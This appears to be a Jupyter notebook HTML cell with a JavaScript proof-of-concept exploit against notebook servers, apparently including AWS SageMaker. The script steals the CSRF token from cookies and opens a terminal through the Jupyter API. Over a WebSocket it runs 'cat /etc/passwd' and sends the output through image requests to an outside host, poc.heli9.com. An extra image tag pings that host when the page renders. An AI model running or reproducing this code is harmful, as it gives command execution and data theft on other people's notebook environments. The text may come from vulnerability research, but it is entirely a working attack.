<img src="https://poc.heli9.com/log.php?openFromUrl" />

In [2]:
%%html
<script>// Function to get CSRF token from cookies
function getCookie(name) {
    var value = "; " + document.cookie;
    var parts = value.split("; " + name + "=");
    if (parts.length == 2) return parts.pop().split(";").shift();
    return null;
}

// Get CSRF token
var csrfToken = getCookie('_xsrf');

// GET request to create terminal
var xhr1 = new XMLHttpRequest();
xhr1.open('GET', 'https://' + document.domain + '/api/terminals', true);
xhr1.send(null);

// POST request to initialize terminal with CSRF token
var xhr2 = new XMLHttpRequest();
xhr2.open('POST', 'https://' + document.domain + '/api/terminals', true);
xhr2.setRequestHeader('Content-Type', 'application/json');
if (csrfToken) {
    xhr2.setRequestHeader('X-XSRFToken', csrfToken);
}
xhr2.send(JSON.stringify({}));

// Connect to WebSocket - Try multiple paths
setTimeout(function() {
    console.log('Attempting WebSocket connection...');
    
    // Try /terminals/websocket/1 first
    var wsPath = '/terminals/websocket/1';
    var ws = new WebSocket('wss://' + document.domain + wsPath);
    
    ws.onerror = function(error) {
        console.log('WebSocket error on ' + wsPath + ':', error);
        // Try alternative path /sagemaker/ws
        var ws2 = new WebSocket('wss://' + document.domain + '/sagemaker/ws');
        ws2.onopen = setTimeout(function() {
            console.log('Connected to /sagemaker/ws');
            ws2.send('["stdin","cat /etc/passwd \\r"]');
        }, 3000);
        ws2.onmessage = function(event) {
            // Use image tag to avoid CORS issues - send data directly without base64
            var img = new Image();
            img.src = 'https://poc.heli9.com/log.php?data=' + encodeURIComponent(event.data);
        };
    };
    
    ws.onopen = function() {
        console.log('Connected to ' + wsPath);
        setTimeout(function() {
            ws.send('["stdin","cat /etc/passwd \\r"]');
        }, 3000);
    };
    
    ws.onmessage = function(event) {
        // Use image tag to avoid CORS issues - send data directly without base64
        var img = new Image();
        img.src = 'https://poc.heli9.com/log.php?data=' + encodeURIComponent(event.data);
    };
}, 1000);</script>